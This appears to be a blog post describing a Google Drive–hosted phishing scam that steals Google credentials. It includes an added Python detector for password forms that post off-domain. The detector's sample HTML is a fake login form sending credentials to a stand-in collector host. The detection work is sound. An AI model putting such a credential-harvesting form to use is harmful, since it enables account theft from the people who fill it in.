I received an email yesterday that was a very clever piece of illegal scamming.
When I looked further into how the scam works I got a surprise. Google Docs and Google Drive are the focus of a very sophisticated phishing scam. This scam is more effective than the usual phishing messages we see every day because the Google Drive phishing page is actually served over SSL from the legitimate Google Drive service itself.
Most phishing mitigation focuses on visually inspecting the URL to make sure the connection is secure. This is good advice, but it does not protect against this specific attack.
This phishing scam starts like many other phishing scams: with an email. The malicious message reportedly arrives with the subject line "Documents" and points to a Google Docs link. Again, it shows up in the address bar as a google.com domain and takes you to a fake log-in page that looks just like the real Google login page. This is how the hackers get you.
[Image: Page where the phishing email leads]
The email I received came from a legitimate customer who uses Google Drive. When I clicked on the link I was brought to the page above. Once you log in through the fake page, you'll even be taken to an actual Google Doc. Your credentials will be sent to a PHP script on a compromised server. You may never even know they've been swiped.
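Because the address bar shows a Google domain, the useful check is where the password form submits, not where the page is hosted. The following is an added example, not part of the original post: it lists every password form on a page and flags those that post anywhere other than the expected sign-in host. The trusted host set, the sample URL and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: the only host that should ever receive a Google sign-in form post.
TRUSTED_LOGIN_HOSTS = {"accounts.google.com"}

# Constructed sample: a look-alike sign-in page hosted under a Google domain.
SAMPLE_URL = "https://drive.google.com/constructed-sample/index.html"
SAMPLE_HTML = """
<form method="post" action="http://compromised.example/collect.php">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
</form>
<form action="/search"><input type="text" name="q"></form>
"""

class PasswordFormFinder(HTMLParser):
    """Collects the action attribute of every <form> holding a password field."""
    def __init__(self):
        super().__init__()
        self.in_form = False
        self.action = ""
        self.has_password = False
        self.actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.in_form, self.has_password = True, False
            self.action = attrs.get("action") or ""
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.has_password:
                self.actions.append(self.action)
            self.in_form = False

def credential_destinations(page_url, html):
    """Return (host, absolute_url) for each password form on the page."""
    finder = PasswordFormFinder()
    finder.feed(html)
    finder.close()
    # A relative or empty action resolves against the page's own URL.
    targets = [urljoin(page_url, a) for a in finder.actions]
    return [(urlsplit(t).hostname, t) for t in targets]

def suspicious_forms(page_url, html):
    """Password forms whose post target is not a trusted login host."""
    return [(h, u) for h, u in credential_destinations(page_url, html)
            if h not in TRUSTED_LOGIN_HOSTS]
```

Calling `suspicious_forms(SAMPLE_URL, SAMPLE_HTML)` reports the off-domain collector even though the page itself loads from a Google host over SSL.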
Not just phishing, but malware too
Symantec have advised users to enable Google's two-factor authentication and to use up-to-date security software on endpoints and gateways.
Symantec say they have contacted Google to seek advice and were given the following response:
"We've removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password."
That was last March; I got the rogue email yesterday.